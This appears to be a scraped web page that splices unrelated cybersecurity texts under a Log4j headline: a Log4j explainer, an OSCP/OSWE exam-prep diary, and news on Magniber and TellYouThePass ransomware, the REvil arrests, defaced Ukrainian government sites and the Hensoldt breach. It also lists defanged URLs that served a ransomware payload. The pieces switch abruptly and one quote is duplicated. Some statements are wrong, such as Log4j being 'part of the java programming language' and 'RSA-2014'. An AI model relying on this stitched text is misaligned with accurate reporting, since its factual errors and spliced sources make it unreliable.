Apache Log4J, The Vulnerability That Destroyed The Internet
Log4j the vulnerability that destroyed the internet, it’s happened..everybody stay calm. What’s the procedure? December wasn’t that jolly in 2021. In fact, a couple of weeks ago a story broke out about a new computer bug found in a piece of very popular, widely used computer code.
The very next day every major cloud storage company was in crisis mode! Google, Amazon, Microsoft you name them, they panicked. The code in question is called Log4J (Apache Log4J) It’s an open-source logging library commonly used by apps and services across the internet, not only does it affect the cloud but also a lot of hardware we use which may include TV’s, security cameras and the likes.
Imagine that millions of us had the same log to keep us and our home safe and now we found out that there’s a master key to unlock them all… Yeah, it’s one great mess for us security specialists and one giant opportunity for hackers.
Generally, Log4J is a piece of code that helps software applications to keep track of their past activities, actions, events and so on, it’s free (hence open-source) on the internet (has been since around 2001) and is widely used in Java applications. When Apache Log4J is asked to do something new it adds it to the “record”. This is where the problem is, if you ask log4j to log a line of malicious code it could go on to execute that code.
Apache Log4J is part of the java programming language which has been a foundational part of computers as we know it since the mid-90s. Now that hackers know about this bug they can exploit it easily and widely, for example, in Minecraft, it’s as easy as typing a line into a public chatbox.
That’s not it, some Twitter users began changing their display names to code strings that could trigger the exploit even the Belgian ministry of defense admitted that hackers already exploited the vulnerability and paralyzed some of the government’s activity.
This bug can paralyze apps, networks, devices and countries and it’s already been hailed as the biggest cybersecurity risk of the decade.
Let’s add even more spice into the mix, some say that it’s the Alibaba company that found the bug and China suspended a deal with Alibaba cloud for not sharing the problem with the government first. Make of it as you will.
Months ago the Chinese government-issued new regulations demanding all networking vendors with critical flaws to report first hand to the government. Alibaba cloud apologized and promised to do better in the future but strangely the vulnerability has been used by multiple Chinese nation-state activity groups so some might wonder if china’s fury is so strong because it couldn’t exploit the bug before it got public.
As of the time of writing, the latest, safest version of Apache Log4J:Version: 2.17.1
Continued reading
The bugs, the devices, China, everything sounds scary, right? Companies are trying their hardest to react properly. Reportedly at Google alone, there are 500+ engineers going through the code but patching the problems isn’t going that well, according to many reports.
Apache has issued several patches but with each one, additional problems have cropped up. The cyber security and infrastructure security agency has announced the release of a scanner that helps to identify vulnerabilities in applications. There are thousands of people working on it day and night.
Industry experts say it could take years for this problem to be fully fixed but there are a couple of things you could do to feel safe, avoid any phishing emails no one is giving out millions of dollars through a strange link. Make sure your apps are updated to the latest versions.
Developers are always trying their hardest to fix newly discovered vulnerabilities so it’s crucial you update as soon as an update is available. As we all know, some applications, repositories have been patched and many have not.
OSCP is a beginner-friendly course, compared to that of the OSWE, that focuses more on the breadth of knowledge rather than depth. While OSWE is more specialized and advanced.
With OSCP, the goal was to find a vulnerable service, look for a public exploit of that service, tweak the exploit a bit, and repeat until you get root. The process involved a lot of google searches for public exploits on discovered versions of services. While with OSWE, the goal was to discover the vulnerable functionality with the help of the source code, build an exploit for it based on how the source code processes the input, and script the entire exploit chain to gain a reverse shell.
Since I’ve got an extensive background in Software Development and have played tons of CTFs with Source Code Review based challenges, I found OSWE easier than OSCP. I believe the general opinion is otherwise. This may have been because OSCP was my first certification, and I did not have enough exposure to HackTheBox (etc) before starting the course. While with OSWE, I had quite a bit of relevant experience.
However, in terms of knowledge and things I took back home, I would give OSWE the points here, as the skills gained were more practical and much more applicable in a real-world scenario compared to what I learned in OSCP.
Is OSWE easier than OSCP?
OSWE is an “expert” level certificate. If you compare it to HTB boxes, it will definitely be around Hard/Insane difficulty, while OSCP/PWK would be around Easy/Medium difficulty.
Do I need Oscp for OSWE?
It is not required to have the OSCP certification in order to attempt the OSWE. However, it is recommended to go for the OSCP first, as it would inevitably give you a strong base for your pentest skills. Think of the OSWE as a specialization in Web Applications.
Cracking The OSWE Exam Guide
Ever since I completed the OSCP, I feared I’d miss the thrill of Offsec Certifications; which is why I decided that the OSWE would be a good course to re-live the thrill of learning and trying harder all over again!
Now that I’ve completed the OSWE Certification in the first exam attempt, I decided to write a semi-technical guide for the AWAE Course by Offensive Security. Thus, in this blog, I’ll be going over the certification, my approach, and some tips that hopefully help you in cracking the OSWE Exam!
P.S. Some parts of this blog may be vague – to not disclose excessive details about the course.
Introduction
What is the OSWE certification?
As per Offensive Security, the OSWE Certification (AWAE Course) is described as:
Advanced Web Attacks and Exploitation (WEB-300) is an advanced web application security review course. We teach the skills needed to conduct white box web app penetration tests.
On earning the certification, you would have a clear and practical understanding of white box web application assessment and security. You’d have proven your ability to review advanced source code in web apps, identify vulnerabilities, and exploit them. You would also be able to assist web development teams in creating and maintaining web apps that are secure by design.
How is the course structured?
Back when I registered for the course in Sept’21, the course was being offered for 1299$ with 60 days of lab time, and 1499$ for 90 days of lab time. I had opted for the 60 days lab version, which I believe is ideal for those who work or study full-time. Offensive Security has now launched a subscription-based model, and more information on that can be obtained here.
Just like any other Offensive Security course, I was given a Course Manual, and accompanying video lessons as the preparation material for the course. The material was really important, as it allowed me to build a methodology to tackle the exam labs, taught many new and creative attack vectors, and highlighted the importance of debugging & logging.
I was also given access to a lab environment that had 2 types of labs:
Guided Labs: These were pre-existing Open Source Software that already had valid vulnerabilities disclosed, and the discovery of these vulnerabilities was in-line with the aim of the course. These applications were carefully selected to cover a wide variety of development frameworks, programming languages, and unique vulnerabilities. The solution, methodology, and alternate pathways were all provided to us in the material.
Un-Guided Labs: These were custom labs created by Offensive Security to give us a better idea of how the exam labs would be structured. This was a key part of evaluating my progress and readiness for the exam. These machines were slightly smaller in scale compared to the guided labs, however, similar in difficulty.
These labs were fairly doable in the 60 days timeframe considering that I had a full-time job on the side. However, now with the new subscription model, I believe time would not be an issue.
What are the pre-requisites?
Offensive Security doesn’t impose any mandatory pre-requisites for this course, however, from a technical standpoint, the course would be much more manageable if you have prior experience in programming (specifically using any MVC based Web Framework), scripting, and Web Security concepts.
If you’re new to Web Development, it would take you additional time to understand the architecture of a web application, and it may be overwhelming to do so during the course due to the wide range of programming languages and frameworks that are covered. Thus, before starting the course, I would recommend you to take up a small project of building a Full-Stack Web Application using an MVC Framework. Some examples of such frameworks are mentioned below:
Django – Based on Python
NodeJS (MERN/MEAN Stack) – Based on JavaScript
Spring – Based on Java
CakePHP– Based on PHP
ASP.NET – Based on C#
Scripting wise, from the perspective of this course, you should be able to mimic GET/POST/Websocket requests, and workflows right from your script. The aim of the course is not only to discover vulnerabilities but also to automate the entire exploitation process (from Authentication Bypass to RCE) with a single script that requires no manual interaction. A few important Python libraries that you’d be using throughout the course:
requests – To initiate GET/POST requests, and set sessions to incorporate complex workflows (For example: Authenticate, upload a file, and visit the uploaded file)
websocket – To mimic WebSocket connections.
(Optional) multiprocessing – I used this library to thread scripts that involved any sort of brute force; this helped me save about 90% time in testing scripts that would otherwise take 20-30 minutes to complete.
sys/os/subprocess – To execute System/OS level commands, and potentially capture their output, if required.
Is OSWE the next milestone for me?
If you’re a Cyber Security Professional looking to get a jump start into White Box Assessments of Web Applications; or if you’re a Software Engineer looking to expand your horizon on Web Security, this course is for you!
Since this is a fairly new course, the industry-wide recognition of this course doesn’t match that of the OSCP. I’ve seen many Job Descriptions mentioning OSWE as an optional requirement, but never as a mandatory requirement. However, the presence of this badge on your profile will have a good impression on a technical recruiter since this is an advanced-level course. But it may not always be the “wow” factor.
For Software Engineers, this certification would be a very unique add-on, and recruiters would appreciate and acknowledge your ability to write secure code.
I signed up for the course solely for the learning (and also the thrill!).
Preparation Timeline
I began the 60 days of lab access on 12th September and spent the first day reading the introductory portion of the course manual. I jumped right into the labs the following day as the introductory material was straightforward, and mostly comprised of topics that security professionals are generally aware of.
On weekdays, I spent around 4-5 hours on labs, while on weekends, around 6-7 hours. This pace was enough for me to complete the guided labs, their extra miles, and my notes by 9th October. I had to end up pausing my preparation until 18th October, as I got sick. The timing couldn’t have been any worse, right? Luckily, I had enough time remaining for the un-guided labs, so I decided to rest well before getting back to work!
After a short, but seemingly long break, I was back at it, and completed the un-guided labs on 23rd October. I registered for my exam for 29th October as I estimated that I would be done with the revision, notes refining, and a little rest by then. I booked the date quite close to when I completed the course, as I was told that the un-guided labs are very close to what the actual exam format is, thus, having completed those labs, I was ready for the exam.
The Exam
You’re given 48 hours to complete the machines given in the exam, and an additional 24 hours to complete the report where you describe your methodology, exploit, PoC script (that replicates the entire exploit chain), and screenshots to prove that you actually pwned the machines!
I booked my exam for 10 AM, as I was accustomed to waking up at around 9:15 AM. It is ideal that you get a good night’s sleep and preferably set the exam at a time when you can wake up without an alarm. Some people do prefer starting the exam late at night due to the peace and quiet in and around their household. However, I had a headphone on me at all times, so that wasn’t a requirement.
Before the exam, you need to make sure you have these ready:
HD Webcam
ID Proof
Scanned Copy of the ID
The proctored session requires you to provide an ID proof via the webcam, which is why a good quality webcam is required. In my case, the ID wasn’t clearly visible on the webcam, so I had to show a scanned copy of the ID via my shared screen. The verification process starts 15 minutes prior to the exam start, so keep everything ready well in advance!
During the exam, be sure to take breaks whenever you’re stuck, and sleep if required. Don’t hesitate to take breaks because you feel you’ve taken many. I took a break roughly after 2 hours to freshen up, and get a small bite to eat. That helped me come back with a new perspective, allowing me to question my thinking better. This is really important because sometimes, you keep re-iterating the same thought and never question your thought process on why you came to a conclusion.
I had faced something similar during the exam: I was going over the source code for one of the machines, and I had skipped over the actually vulnerable function twice just because I thought “nah, that wouldn’t be it“. The third time, just after I had gotten back from a short break, I questioned my assumption instantly and got through!
Also, don’t forget to take a screenshot of every step you take once you’ve found the intended exploit chain. Once you have all the screenshots, and code snippets all compiled, you can use the additional 24 hours provided to format your report with the information you’ve jotted down during the exam. I kept updating a rough version of the report during the exam itself and kept the formatting for later.
I had submitted the last flag with 15 hours left on the clock; that’s when I took a nice and long break to get into the reporting mode. The report in total took around 10 hours to complete, and I submitted it an hour after my exam ended. The paranoia kept forcing me to re-read the 50 page report until I couldn’t bother reading anymore.
In total, I slept for around 9 hours during the exam and managed to submit the final report in 49 hours from the exam start. The machines in the exam were similar to the labs, and covering all of the material in the course manual should be more than enough to be ready for the exam. All that remains is that you have a clear head, a good night’s sleep, and some patience to read through a lot of code!
Note Taking
Shifting gears to how I managed to clear the OSWE Exam from a technical standpoint, a good transition to this blog will be to go over my note taking process.
I used Obsidian as my notes app. This was my first time using the app, but I really loved the way it linked different aspects of my notes together. It is also equipped with a powerful search functionality, due to which I would definitely recommend using this as your primary notes app.
It is also important to keep a backup of your notes, and I used git for this purpose. Every few days, I’d just push the updated notes onto GitHub to have a backup, and a way to go back to old versions, if required.
How did I structure my Notes?
I divided my notes into the following sections:
Images – Just a folder for all the screenshots that I pasted into Obsidian.
Labs – Where I stored my methodology, extra-miles, and scripts for each of the labs.
I used the following file name syntax for naming the notes for each of the labs: <ProgrammingLanguage> (<ExploitChain: SQL Injection to Deserialization to RCE>) <MachineName> - <IPAddress>. This allowed me to quickly get a glance at the type of vulnerabilities covered for each programming language during the exam. This helps in prioritizing what vulnerabilities you should look for when you attack a target. This does not necessarily reduce the sample space, because there is no guarantee that the exploit chain for the programming language would be similar to what you’ve done in the labs, but it’s always a good place to start!
For each Lab, my notes contained the following sections:
A section to highlight what I tried, and why that failed/passed – this helped me during the revision phase where I could sort of re-live my methodology without actually having to do the labs.
The final steps – spoon-fed so that they can be replicated, if required in the exam.
The final scripts – if I wasn’t lazy enough to actually code one for it.
A references section – to highlight anything new that I read to complete that machine. The individual links were directly linked to a particular section in the notes. I had this section to go over during the revision phase, and as expected, it wasn’t useful during the exam.
A Keywords section – this was solely for the search functionality on Obsidian, I used hashtags to highlight important aspects covered in the lab. This could be used in the exam if I was stuck on a particular exploit chain, I would have a place to refer to. However, I did not use this during my exam.
Scripts – These were a compilation of common scripts that I felt could be re-used (SQL Injection – Time & Boolean Based Blind – both threaded & non-threaded versions; File Upload, etc.). This helped me greatly during the exam, as I did not have to spend extra time scripting common exploits that I already covered in the labs. I re-used the code and modified it as required.
Debugging & Logging – As the name suggests, I used this section to note the steps to setup debugging on different frameworks and to enable logging on databases for inspecting queries. This was mostly redundant, as we are provided with a debugging machine that is pre-configured to debug the labs, without any additional configuration. But this is a good section to have and maybe useful if things don’t go as expected. To save some effort, there’s a certain post on the Offsec Forum where someone took the effort to mention the steps to setup debugging on every framework. It’s hard to miss that post.
Nudges – This was my most visited section during the exam. Here, I noted down the following:
All the possible things I may want to check for each language/web framework. It covered important function calls, object initializations, or general keywords that would possibly indicate the presence of a vulnerability.
For Instance: readObject & ObjectInputStream – Deserialization (<Reference to a lab that covers this>).
The areas that I got stuck at in the labs, or what I did wrong (in a given context).
A summary of the methodology for each step of the exploit chain. This contained the possible vulnerabilities/pathways I need to look for at each step of the way (Authentication Bypass, Privilege Elevation, and RCE).
These sections were more than enough for me to revise, and refer to during the exam. I did not feel that anything was missing from the notes, and found the Nudges & Scripts sections the most helpful, as I mostly only opened my notes when I was stuck during the exam to make sure that I didn’t skip over any steps during my initial reconnaissance and discovery phases.
My Methodology?
The course covered a wide variety of vulnerabilities from the OWASP Top 10 list, and in various web frameworks. We also went over various logical vulnerabilities that required creative exploit vectors, and were fun to discover!
Even though most of the vulnerabilities present in the labs/exam are conventional OWASP Top 10 based, the discovery phase is not that straightforward for them. In the next few bullet points, I’ll briefly go over my methodology, keeping in mind that I can’t disclose too much about the same. I will keep it simple because as you progress through the labs, you will start to develop a methodology of your own, and you won’t end up needing assistance! And this methodology can be carried over to actual White Box Assessments!
Read the source of the application to locate the unauthenticated endpoints. The location of endpoints, and whether they require authentication is variable for each development framework, thus, this is something that would come with practice. Endpoints can also be enumerated via fuzzing the web application, however, this won’t be as thorough (and effective) as exploring the available routes from the source.
Enable logging/debugging to figure out where the vulnerability is. Explore the logic behind the entire authentication flow (Register, Login, etc.), and think of creative attack vectors that could possibly bypass the logic. This goes hand in hand with fuzzing the available input fields to populate the logs being captured for analysis.
Once you discover the vulnerable location, you will have to go through the source code to figure out any sanitization/blacklisting/whitelisting that is taking place, debugging sometimes aids in reducing the complexity of this task as you can track where your input goes through and how it gets modified on its way to finally being processed/rendered/stored. This would help you in building an exploit for the discovered vulnerability.
As you move from the Authentication Bypass to the other stages of the machine, the scope of testing expands with new authenticated endpoints being added to the mix, evaluate these endpoints with the perspective of escalating privileges, or gaining RCE.
What if I’m stuck?
Look back at your notes, go over your methodology to see if you missed anything. A good way to make sure you covered everything is to make a list of authenticated/unauthenticated endpoints, and write down what you concluded about each of the endpoints.
Go over the vulnerable keywords for the language that the application is coded in, from your notes.
Go over the source again, but this time with a fresh mind. Start your methodology from scratch, because in your first iteration, you may have missed over the most obviousthings!
Apply a Black Box testing methodology, and explore logs to see if anything’s out of the ordinary. Debug the application to validate the application flow. There may be times when the main logic for a route is not in the controllers, but in a middleware.
Found the vulnerability, but unable to exploit it? Look for common payload based bypasses on the interwebs, sometimes, you may get lucky. This is not ideal, as you will be able to dissect why your payload/exploit isn’t working. Stick to the basics if nothing works for you, use debugging to figure out what’s happening to your payload, and why is it behaving the way it is.
What could have been better?
Although this course was really informative and well structured, I believe that some aspects of this course could have been slightly better. These are minor concerns that would not affect the preparation in any way, but would have made things slightly smoother in the entirety.
The debugging machines given to us during the Exam were barely usable. With a 2 seconds delay to every action, debugging had become very cumbersome and made the entire experience prone to misclicks – ending up in issues that warranted a machine reset. In the end, I got used to the delay, but I did waste quite a bit of time while debugging in general.
The support team had different responses to technical queries relating to my VPN connection. This ambiguity almost cost me my exam attempt. Luckily the issues were resolved on my end, otherwise, I was sure that this would have eaten up a major chunk of my exam time.
Regardless of these minor issues, which I’m sure will fade away as the course matures, the overall experience of the labs and the exam was very positive. The proctors were super friendly and responded instantly to any query that I had.
Resources I referred to?
hxtps://github.com/carlospolop/hacktricks/tree/master/pentesting-web – My go-to guide for vulnerability discovery methodology.
hxtps://z-r0crypt.github.io/blog/2020/01/22/oswe/awae-preparation/ – For practicing the type of vulnerabilities. This can be used as a preparation resource before signing up for the course.
hxtps://github.com/wetw0rk/AWAE-PREP
Final Thoughts (Extended)
OSCP
In general, the OSCP exam is well known for its difficulty, and it’s not the exam systems but rather the 24-hours time limit, which makes it challenging. Due to the continuous enumeration and exploitation of machines, the constant debugging of issues, the fatigue quickly builds up, which causes one’s concentration and efficiency to suffer. These eventually lead to more problems later on. To break this circle, the best advice I can give is to have a thorough plan to ensure you’ll always know what to do next, how much time you are willing to sink into a single problem, and document everything you need to do for compromising a host. The exam machines itself were up-to-date systems so that you couldn’t take the easy kernel exploit path like in the case of some of the lab machines. Difficulty-wise, I found that the exam machines were more difficult than the ones in the lab, but not by much. In the end, I managed to complete all the objectives and gain administrative shell access on all target machines. My final exam report was 38 pages long, and the lab report I submitted had 122 pages.
OSWE
Even with its current shortcomings, I can safely recommend the AWAE/OSWE course. If you are willing to sink in the time, then anything the course explains in-depth, it does it exceptionally. It introduces techniques and chains of exploits, that open up new ways to look at vulnerabilities and makes that ticking in the back of your head asking how could this be used later on in unexpected ways. As for the problems I have with the course, I hope future updates to the course will address them. Until then, there are other courses available out there that nicely complement the AWAE course, although in a bit steeper price range. Consider this course as the start of a journey rather than the final goal.
Few closing words for people who are thinking about trying to get OSCP certified. While Offsec advertises its course as not beginner-friendly, I have to disagree. I think the most value of this certification is for people who want to break into InfoSec, like CS students or IT personnel at the beginning of their NetSec career, rather than seasoned pentesters. Definitely, don’t allow yourselves to become disheartened by the fame OSCP has and dive into the deep end. At the end of the day, the course is a test of discipline and determination above all else.
The Magniber ransomware has been spotted using Windows application package files (.APPX) signed with valid certificates to drop malware pretending to be Chrome and Edge web browser updates.
This distribution method marks a shift from previous approaches seen with this threat actor, which typically relies on exploiting Internet Explorer vulnerabilities.
Browser update notification
The infection begins by visiting a payload dropping website, researchers at Korea cybersecurity company AhnLab note in a report published today.
How victims get to the website, remains unclear. The lure could be delivered via phishing emails, links sent through IMs on social media, or other distribution methods.
Two of the URLs distributing the payload are “hxxp://b5305c364336bqd.bytesoh.cam”, and “hxxp://hadhill.quest/376s53290a9n2j”, but these may not be the only ones.
Visitors to these sites receive an alert to update their Edge/Chrome browser manually, and are offered an APPX file to complete the action.
APPX files are Windows application package files created for streamlined distribution and installation and have been abused by various threats in the past for malware distribution.
In the case of Magniber ransomware, the disguised APPX file is digitally signed with a valid certificate, so Windows sees them as trusted files that do not trigger a warning.
The threat actor’s choice to use APPX files is most likely driven by the need to reach a wider audience since the market share for Internet Explorer is dwindling into extinction.
Dropping the payload
Accepting the malicious APPX file results in creating two files on the “C:\Program Files\WindowsApps” directory, namely the ‘wjoiyyxzllm.exe’ and the ‘wjoiyyxzllm.dll’.
These files execute a function that fetches the Magniber ransomware payload, decodes it, and then executes it.
After encrypting the data on the system, the threat creates the following ransom note:
Although the note is in English, it is worth noting that Magniber ransomware targets Asian users exclusively these days.
At the moment there is no possibility to decrypt files locked by this malware free of charge.
Unlike most ransomware operations, Magniber did not adopt the double extortion tactic, so it does not steal files before encrypting the systems.
Backing up the data on a regular basis is a good solution to recover from attacks with low-tier ransomware like Magniber.
TellYouThePass ransomware has re-emerged as a Golang-compiled malware, making it easier to target more operating systems, macOS and Linux, in particular.
The return of this malware strain was noticed last month when threat actors used it in conjunction with the Log4Shell exploit to target vulnerable machines.
Now, a report from Crowdstrike sheds more light on this return, focusing on code-level changes that make it easier to compile for other platforms than Windows.
Why Golang?
Golang is a programming language first adopted by malware authors in 2019 due to its cross-platform versatility.
Furthermore, Golang allows lining dependency libraries into a single binary file, which leads to a smaller footprint of command and control (C2) server communications, thus reducing detection rates.
It is also easier to learn than other programming languages, e.g. Python, and features modern debugging and plugin tools that simplify the programming process.
A notable example of a successful malware written in Golang is the Glupteba botnet, which was disrupted last month by Google’s security specialists.
New TellYouThePass samples
Crowdstrike analysts report a code similarity of 85% between the Linux and Windows samples of TellYouThePass, showcasing the minimal adjustments needed to make the ransomware run on different operating systems.
One noteworthy change in the latest samples of the ransomware is the randomization of the names of all functions apart from the ‘main’ one, which attempts to thwart analysis.
Prior to initiating the encryption routine, TellYouThePass kills tasks and services that could risk the process or result in incomplete encryption, like email clients, database apps, web servers, and document editors.
Moreover, some directories are excluded from encryption to prevent rendering the system non-bootable and thus waste any chance to get paid.
The ransom note dropped in the recent TellYouThePass infections asks for 0.05 Bitcoin, currently converting to about $2,150, in exchange for the decryption tool.
The encryption scheme uses the RSA-2014 and AES-256 algorithms, and there is no free decryptor available.
For the time being, macOS samples have not been spotted.
A senior Biden administration official on Friday said one of the Russian hackers arrested earlier in the day by that country’s security service is responsible for the ransomware attack that temporarily crippled the Colonial Pipeline last year.
“We understand that one of the individuals who was arrested today was responsible for the attack against Colonial Pipeline last spring,” the official told reporters during a conference call, referring to the arrests carried out by Russia’s Federal Security Service of members of the REvil ransomware gang.
TASS, the country’s state news agency, said 14 members of the notorious digital gang had been detained. The FSB claimed that it seized more than 426 million rubles, or $600,000 in cash, as well as cryptocurrency wallets, computers and 20 cars.
Last year, a separate Russian hacker group known as DarkSide claimed responsibility for the Colonial attack. The FBI later confirmed the group was behind the incident, which caused panic buying of gasoline along the East Coast.
However, it is possible that the individual — who the official did not name — worked for one organization before leaving for another or worked for both simultaneously.
REvil was responsible for the supply-chain attack on the software firm Kaseya last year — which impacted more than 1,000 businesses and organizations worldwide — and the digital attack on food processing giant JBS. The group shuttered its operations last July, making a brief comeback later before some of their dark web servers were seized by authorities, seemingly wiping out the criminal group.
Friday’s arrests come amid tensions between Washington and Moscow, as Russia has amassed thousands of troops on the Ukrainian border. The U.S. has publicly accused the Kremling of preparing an invasion of Ukraine and creating a pretext to take such action.
The Biden official, who briefed reporters on condition of anonymity, said the administration believes the activity by Russia’s internal intelligence agency is “not related to what’s happening with Russia and Ukraine,” adding that the White House has been clear it will impose “severe costs” on the Kremlin in coordination with Western allies.
The official noted that following last year’s in-person meeting between President Joe Biden and Russian leader Vladimir Putin, the two countries established an experts group on cybersecurity where administration officials have provided the Kremlin with information about certain cybercriminals operating within its borders and conveyed what actions Washington expects the government to take against them.
“We’re committed to seeing those conducting ransomware attacks against Americans brought to justice,” according to the official, who said the administration was pleased by Friday’s arrests and that expectation is that Russia “would be pursuing legal action within its own system.”
“While we continue to assess the impact with Ukrainians, it seems limited so far, with multiple websites coming back online,” the official told reporters.
Threat actors defaced multiple Ukrainian government websites after talks between Ukrainian, US, and Russian officials hit a dead this week.
Threat actors have defaced multiple websites of the Ukrainian government on the night between January 13 and January 14. The attacks were launched after talks between Ukrainian, US, and Russian officials hit a dead end on Thursday.
The attackers deleted the content of multiple websites, including the Ukrainian Ministry of Foreign Affairs, Ministry of Education and Science, Ministry of Defense, the State Emergency Service, and the Cabinet of Ministers.
Defaced websites were displaying the following message in Russian, Ukrainian and Polish languages.
“Ukrainian! All your personal data has been sent to a public network. All data on your computer is destroyed and cannot be recovered. All information about you stab (public, fairy tale and wait for the worst. It is for you for your past, the future and the future. For Volhynia, OUN UPA, Galicia, Poland and historical areas.” reads a translation of the message.
Ukrainian Government is investigating the attack, but intelligence experts speculate the offensive was launched by Russia-linked actors. The Ukrainian government has yet to officially attribute the attacks to any nation-state actor.
According to journalist Kim Zetter, attackers apparently exploited a vulnerability in the October CMS tracked as CVE-2021-32648, a news later confirmed by the national CERT.
“On the night of January 13-14, a number of government websites, including the Ministry of Foreign Affairs, the Ministry of Education and Science and others, were hacked. Provocative messages were posted on the main page of these sites. The content of the sites was not changed and the leakage of personal data, according to preliminary information, did not occur.” reads the advisory published by CERT-UA “According to the results of processing possible attack vectors, the use of the October CMS vulnerability by attackers is not excluded:”
Ukrainian CERT states personal data was not stolen by attackers.
The CERT-UA provided recommendations on how to recover the compromised websites.
The Russian government said today it arrested 14 people accused of working for “REvil,” a particularly aggressive ransomware group that has extorted hundreds of millions of dollars from victim organizations.
The Russian Federal Security Service (FSB) said the actions were taken in response to a request from U.S. officials, but many experts believe the crackdown is part of an effort to reduce tensions over Russian President Vladimir Putin’s decision to station 100,000 troops along the nation’s border with Ukraine.
The FSB said it arrested 14 REvil ransomware members, and searched more than two dozen addresses in Moscow, St. Petersburg, Leningrad and Lipetsk. As part of the raids, the FSB seized more than $600,000 US dollars, 426 million rubles (~$USD 5.5 million), 500,000 euros, and 20 “premium cars” purchased with funds obtained from cybercrime.
“The search activities were based on the appeal of the US authorities, who reported on the leader of the criminal community and his involvement in encroaching on the information resources of foreign high-tech companies by introducing malicious software, encrypting information and extorting money for its decryption,” the FSB said. “Representatives of the US competent authorities have been informed about the results of the operation.”
The FSB did not release the names of any of the individuals arrested, although a report from the Russian news agency TASSmentions two defendants: Roman Gennadyevich Muromsky, and Andrey Sergeevich Bessonov. Russian media outlet RIA Novosti released video footage from some of the raids:
REvil is widely thought to be a reincarnation of GandCrab, a Russian-language ransomware affiliate program that bragged of stealing more than $2 billion when it closed up shop in the summer of 2019. For roughly the next two years, REvil’s “Happy Blog” would churn out press releases naming and shaming dozens of new victims each week. A February 2021 analysis from researchers at IBM found the REvil gang earned more than $120 million in 2020 alone.
But all that changed last summer, when REvil associates working with another ransomware group — DarkSide — attacked Colonial Pipeline, causing fuel shortages and price spikes across the United States. Just months later, a multi-country law enforcement operation allowed investigators to hack into the REvil gang’s operations and force the group offline.
In November 2021, Europolannounced it arrested seven REvil affliates who collectively made more than $230 million worth of ransom demands since 2019. At the same time, U.S. authorities unsealed two indictments against a pair of accused REvil cybercriminals, which referred to the men as “REvil Affiliate #22” and “REvil Affiliate #23.”
It is clear that U.S. authorities have known for some time the real names of REvil’s top captains and moneymakers. Last fall, President Biden told Putin that he expects Russia to act when the United States shares information on specific Russians involved in ransomware activity.
So why now? Russia has amassed approximately 100,000 troops along its southern border with Ukraine, and diplomatic efforts to defuse the situation have reportedly broken down. The Washington Post and other media outlets today report that the Biden administration has accused Moscow of sending saboteurs into Eastern Ukraine to stage an incident that could give Putin a pretext for ordering an invasion.
“The most interesting thing about these arrests is the timing,” said Kevin Breen, director of threat research at Immersive Labs. “For years, Russian Government policy on cybercriminals has been less than proactive to say the least. With Russia and the US currently at the diplomatic table, these arrests are likely part of a far wider, multi-layered, political negotiation.”
President Biden has warned that Russia can expect severe sanctions should it choose to invade Ukraine. But Putin in turn has said such sanctions could cause a complete break in diplomatic relations between the two countries.
Dmitri Alperovitch, co-founder of and former chief technology officer for the security firm CrowdStrike, called the REvil arrests in Russia “ransomware diplomacy.”
“This is Russian ransomware diplomacy,” Alperovitch said on Twitter.
“This is Russian ransomware diplomacy,” Alperovitch said on Twitter. “It is a signal to the United States — if you don’t enact severe sanctions against us for invasion of Ukraine, we will continue to cooperate with you on ransomware investigations.”
The REvil arrests were announced as many government websites in Ukraine were defaced by hackers with an ominous message warning Ukrainians that their personal data was being uploaded to the Internet. “Be afraid and expect the worst,” the message warned.
Experts say there is good reason for Ukraine to be afraid. Ukraine has long been used as the testing grounds for Russian offensive hacking capabilities. State-backed Russian hackers have been blamed for the Dec. 23, 2015 cyberattack on Ukraine’s power grid that left 230,000 customers shivering in the dark.
Russia also has been suspected of releasing NotPetya, a large-scale cyberattack initially aimed at Ukrainian businesses that ended up creating an extremely disruptive and expensive global malware outbreak.
Although there has been no clear attribution of these latest attacks to Russia, there is reason to suspect Russia’s hand, said David Salvo, deputy director of The Alliance for Securing Democracy.
“These are tried and true Russian tactics. Russia used cyber operations and information operations in the run-up to its invasion of Georgia in 2008. It has long waged massive cyberattacks against Ukrainian infrastructure, as well as information operations targeting Ukrainian soldiers and Ukrainian citizens. And it is completely unsurprising that it would use these tactics now when it is clear Moscow is looking for any pretext to invade Ukraine again and cast blame on the West in its typical cynical fashion.”
According to South Korea’s military, North Korea has conducted its third suspected weapons test of the year on Friday, firing an “unidentified projectile” from its east coast.
This comes hours after the US Treasury Department announced sanctions on eight North Korean and Russian individuals and entities for supporting North Korea’s ballistic missile programs.
Hensoldt, a multinational defense contractor headquartered in Germany, has confirmed that some of its UK subsidiary’s systems were compromised in a ransomware attack.
The defense multinational develops sensor solutions for defense, aerospace, and security applications is listed on the Frankfurt Stock Exchange and had a turnover of 1.2 billion euros in 2020.
It operates in the US under a special agreement that allows it to apply for classified and sensitive US government contracts.
Its products include radar arrays, avionics, and laser rangefinders used on M1 Abrams tanks, various helicopter platforms, and LCS (Littoral Combat Ship) by the US Army, US Marine Corps, and the US National Guard.
Hensoldt announced on Thursday that it’s equipping German-Norwegian U212 CD submarines built by the kta consortium with next-generation fully digital optronics equipment.
While the company is yet to issue a public statement regarding this incident, the Lorenz ransomware gang has already claimed the attack.
On Wednesday, a Hensholdt spokesperson confirmed Lorenz’s claims after BleepingComputer reached out over email.
“I can confirm that a small number of mobile devices in our UK subsidiary has been affected,” Hensoldt’s Head of Public Relations, Lothar Belz, told BleepingComputer.
However, Belz denied providing additional information regarding the incident, saying that “for obvious reasons, we do not disclose any more details in such cases.”
Ransomware gang says they were paid
For its part, the Lorenz ransomware group claims to have stolen an undisclosed amount of files from Hensholdt’s network during the attack.
The gang says payment has been made, with 95% of all stolen files published on the ransomware’s data leak website since December 8, 2021, when the Hensoldt leak page was created.
While Lorenz shows the leak as being “Paid,” it’s unclear if that means Hensoldt paid a ransom or if another threat actor purchased the data.
This is because the Lorenz ransomware gang is known for selling stolen data to other threat actors to pressure victims into paying ransoms.
If no ransom is paid after all data is leaked as password-protected RAR archives, Lorenz will also release the password to access the data leak archives to make the stolen files publicly available to anyone who downloads leaked archives.
This ransomware gang will also sell access to the victims’ internal networks to other threat actors along with any stolen data.
Lorenz began operating in April 2021 and has since been targeting enterprise organizations worldwide, demanding hundreds of thousands of dollars in ransoms from each of their victims.
In June, Dutch cybersecurity firm Tesorion released a free Lorenz ransomware decryptor, which victims can use to recover some file types, including Office documents, PDF files, images, and videos.
Lots of people “run Linux” without really knowing or caring – many home routers, navigational aids, webcams and other IoT devices are based on it; the majority of the world’s mobile phones run a Linux-derived variant called Android; and many, if not most, of the ready-to-go cloud services out there, rely on Linux to host your content.
